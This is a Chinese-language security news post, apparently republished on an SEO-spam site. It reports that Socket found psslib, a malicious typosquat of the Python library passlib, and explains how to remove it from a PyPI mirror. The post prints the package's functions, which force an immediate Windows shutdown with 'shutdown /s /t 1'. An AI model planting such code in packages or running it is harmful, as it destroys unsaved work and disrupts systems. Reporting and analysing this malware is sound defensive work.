当前位置: 首页 > wzjs >正文

企业网站案例展示温州seo顾问

企业网站案例展示,温州seo顾问,php模板网站,在线考试类网站怎么做文章目录 恶意 Python 包“psslib”仿冒 passlib如何避免psslib的威胁 恶意 Python 包“psslib”仿冒 passlib Socket 的威胁研究团队发现了一个名为 psslib 的恶意 Python 包,旨在以提供密码安全功能为幌子突然关闭 Windows 系统。 该软件包由威胁行为者使用别名…

文章目录

    • 恶意 Python 包“psslib”仿冒 passlib
    • 如何避免psslib的威胁

恶意 Python 包“psslib”仿冒 passlib

Socket 的威胁研究团队发现了一个名为 psslib 的恶意 Python 包,旨在以提供密码安全功能为幌子突然关闭 Windows 系统。

该软件包由威胁行为者使用别名 umaraq 编写,是合法 passlib 库的错误拼写,passlib 库是数百万开发人员信赖,并且广泛使用的密码哈希工具包。

“恶意 psslib 包通过将自己伪装成安全实用程序来利用这种信任,同时包含可能导致立即数据丢失和系统中断的代码,”

攻击从一个名称技巧开始:psslib 与 passlib 非常相似,可能希望欺骗快速键入或依赖自动完成的开发人员。passlib 每月下载量超过 890 万次。

“Socket 的 AI Scanner 将 psslib 标记为恶意,因为它具有破坏性的系统关闭行为。”

导入后,由于密码输入错误而触发,psslib 将执行 Windows 关机命令 (shutdown /s /t 1),使计算机在 1 秒内关闭电源。

该软件包假装通过名为 spc() 的函数提供密码保护,并使用 easygui.enterbox() 进行用户输入。如果用户输入与预设值不匹配,它将立即关闭系统。

def spc(password):# Malicious code: Forces immediate system shutdown on incorrect inputif easygui.enterbox('enter password:-') != password:os.system("shutdown /s /t 1")  # Shutdown in 1 second

除此之外,psslib 还包括另外两个函数 — src() 和 error() — 它们根本不在进行任何身份验证的情况下关闭系统。

def src():# Directly forces system shutdown without user inputos.system("shutdown /s /t 1")def error(message):# Writes an error message and forces system shutdownsys.stderr.write(message)os.system("shutdown /s /t 1")

这些额外的向量确保即使对库的有限使用也可能立即危及开发人员的计算机,尤其是在以提升的权限运行的环境中。

该恶意软件专门针对基于 Windows 的开发环境,在这些环境中,关闭命令有效且经常被忽视。虽然由于作系统命令差异,有效负载在 Linux 或 macOS 上无害地失败,但该软件包的 Windows 特定性质表明了目标意图。

“攻击是完全有效的。shutdown 命令按预期执行,强制立即关闭系统,这可能导致:未保存的工作和数据丢失、打开的文件和数据库损坏以及正在运行的服务中断。

如何避免psslib的威胁

需要现在mirror服务器上查看是否存在psslib的威胁包
在这里插入图片描述
如果存在,可以手动进行删除:

sudo bandersnatch delete psslib

  • Ubuntu挂载NFS(Network File System) ,怎么解决权限不一致的问题?
  • Ubuntu镜像源cn.arichinve.ubuntu.com不可用原因分析和解决
  • Windows 11安装Ubuntu 实战教程
  • PowerShell无人参与安装最新版本SQL Server Management Studio (SSMS)
  • VRRP(虚拟路由器冗余协议)标准协议工作机制与优势介绍
  • Linux MTR(My TraceRoute)command
http://www.dtcms.com/wzjs/521112.html

相关文章:

  • 网站建设 深圳资讯门户类网站有哪些
  • thinkphp企业网站系统商业网站设计
  • 聊城开发区建设局网站宁波seo快速优化
  • 哈尔滨菜牌制作哈尔滨seo关键词排名
  • 网站建设文化事业建设费黑帽seo培训多少钱
  • asp政府网站系统南宁网络推广软件
  • 怎么开发一个网站站长之家seo工具包
  • 本地用织梦做网站推广产品的渠道
  • 泉州网站建设方案详细关键词有几种类型
  • 做背景视频哪个网站好平台怎么推广
  • 企业黄页信息查询网武汉百度seo网站优化
  • 哪个行业必须做网站批量查询神马关键词排名
  • 网站提高内容的丰富度创意下载爱城市网app官方网站
  • html5高端网站建设织梦模板软文营销经典案例
  • 网站设计步骤及注意事项今日疫情最新消息全国31个省
  • 网站建设开发实训报告总结网站新域名查询
  • 做网站前台步骤云seo关键词排名优化软件
  • 建立网站的步骤和费用seo网站排名优化教程
  • 公司做网站需要准备什么资料比较靠谱的网站
  • 网站开发属于软件吗互联网广告销售好做吗
  • 个人做网站哪种类型的网站好西安seo服务外包
  • 重庆怎么制作网站?青岛seo推广专员
  • 目前做美术的网站以及app制作网站教程
  • 天津非常好的网站建设国内永久免费的云服务器
  • 做网站从哪方面入门seo外链要做些什么
  • 甘肃网络公司网站建设舆情信息
  • 泰州做企业网站的哪里好无锡网站制作推广
  • 祖庙高明网站建设世界足球排名最新
  • 如何搭建一个自己的网站在线营销推广
  • 企石镇网站建设公司seo实战密码第四版